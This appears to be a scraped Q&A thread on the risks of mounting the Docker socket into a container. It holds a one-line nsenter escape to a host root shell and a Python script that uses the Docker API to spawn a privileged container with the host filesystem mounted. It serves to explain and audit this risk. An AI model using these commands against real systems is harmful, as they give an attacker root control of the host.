What are the things I can do by mounting /var/run/docker.sock as a volume to a docker container?

Time:06-14

After mounting /var/run/docker.sock into a running docker container, I would like to explore the possibilities. Can I issue docker commands from inside the container, like docker stop? Why is it considered a security risk? What exact commands could I run as a root user in docker that could possibly compromise the host?

CodePudding user response:

It's trivial to escalate access to the docker socket to a root shell on the host.

docker run -it --rm --privileged --pid host debian nsenter -t 1 -m -u -n -i bash

CodePudding user response:

I couldn't give you exact commands to execute, since I'm not testing this, but I'm assuming you could:

  • Execute docker commands, including mounting host volumes to newly spawned docker containers, allowing you to write to the host
  • Overwrite the socket to somehow inject arbitrary code into the host
  • Escalate privileges to other docker containers running on the same machine
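Both answers come down to the same thing: the socket is the Docker Engine's HTTP API, so anything that can open it can list and stop every container on the host and create new ones with whatever HostConfig it likes. The script below is an added example for this thread, not code posted by either answerer. It talks to the engine directly over the Unix socket with nothing but the Python standard library (no docker CLI inside the container is needed), covers the `docker stop` question, and builds the create request that reproduces the privileged, host-PID, host-root-mounted container from the first answer and the "mount host volumes to write to the host" route from the second. It assumes the socket is at the default path, that the engine accepts API version v1.41 (Docker 20.10 or later), and uses "debian" and "/host" as illustrative image and mount point; `risky_binds` is a small audit helper added here for the defender's side of the same fact.

```python
"""Drive the Docker Engine API through a mounted /var/run/docker.sock.

Added example for this thread, not code posted by either answerer.
Assumptions: socket at the default path, engine accepts API version
v1.41, image "debian" and mount point "/host" are illustrative.
"""
import http.client
import json
import socket
import sys

SOCK_PATH = "/var/run/docker.sock"
API_PREFIX = "/v1.41"  # assumption: Docker 20.10+ serves this version
DOCKER_SOCKET_PATHS = {SOCK_PATH, "/run/docker.sock"}


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over an AF_UNIX socket instead of TCP: the daemon speaks
    plain HTTP on the socket, so no docker binary is required."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def socket_exposed(path=SOCK_PATH):
    """True when this process can actually connect to the engine socket.
    An attempted connect is the honest test: a ':ro' bind mount of the
    socket does not stop connect(), so checking mount flags would mislead."""
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        s.connect(path)
        return True
    except OSError:
        return False
    finally:
        s.close()


def api_request(method, path, body=None, sock_path=SOCK_PATH):
    """Send one request to the engine; return (HTTP status, decoded body)."""
    conn = UnixHTTPConnection(sock_path)
    data = json.dumps(body) if body is not None else None
    conn.request(method, API_PREFIX + path, body=data,
                 headers={"Content-Type": "application/json"})
    resp = conn.getresponse()
    raw = resp.read()
    conn.close()
    try:
        return resp.status, (json.loads(raw) if raw else None)
    except ValueError:
        return resp.status, raw.decode(errors="replace")


def list_containers(sock_path=SOCK_PATH):
    """Same as `docker ps -a`: every container on the host, not just ours."""
    status, body = api_request("GET", "/containers/json?all=true",
                               sock_path=sock_path)
    return body if status == 200 else []


def stop_container(container_id, sock_path=SOCK_PATH):
    """Same as `docker stop <id>`: 204 on success, 304 if already stopped."""
    status, _ = api_request("POST", "/containers/%s/stop" % container_id,
                            sock_path=sock_path)
    return status in (204, 304)


def host_root_container_spec(image="debian", mount_point="/host"):
    """Body for POST /containers/create: host root filesystem bind-mounted
    read-write at mount_point, host PID namespace, full privileges. This is
    the API form of `docker run --privileged --pid host -v /:/host`."""
    return {
        "Image": image,
        "Cmd": ["sh", "-c", "id && cat %s/etc/hostname" % mount_point],
        "HostConfig": {
            "Binds": ["/:%s" % mount_point],
            "Privileged": True,
            "PidMode": "host",
        },
    }


def spawn_host_mount_container(sock_path=SOCK_PATH, **spec_args):
    """Create and start the container above; returns its id, or None."""
    status, body = api_request("POST", "/containers/create",
                               host_root_container_spec(**spec_args),
                               sock_path=sock_path)
    if status != 201:
        return None
    cid = body["Id"]
    status, _ = api_request("POST", "/containers/%s/start" % cid,
                            sock_path=sock_path)
    return cid if status in (204, 304) else None


def risky_binds(binds):
    """Audit helper: bind mounts whose host side is '/' or the engine socket
    hand over the host, with or without a ':ro' suffix."""
    return [b for b in binds
            if b.split(":", 1)[0] in DOCKER_SOCKET_PATHS | {"/"}]


if __name__ == "__main__":
    if not socket_exposed():
        sys.exit("no usable docker socket at %s" % SOCK_PATH)
    for c in list_containers():
        print(c["Id"][:12], c["Image"], c["State"])
    print("spawned", spawn_host_mount_container())
```

Run it from inside a container that has the socket mounted; the container listing comes back regardless of which container you are in, and the spawned container's `id` and `/host/etc/hostname` output (visible with `docker logs` on the host) show it is running as root against the host's filesystem. The same request bodies are what the `docker` CLI sends, which is why file permissions or a read-only mount on the socket buy nothing: access to the API is the privilege.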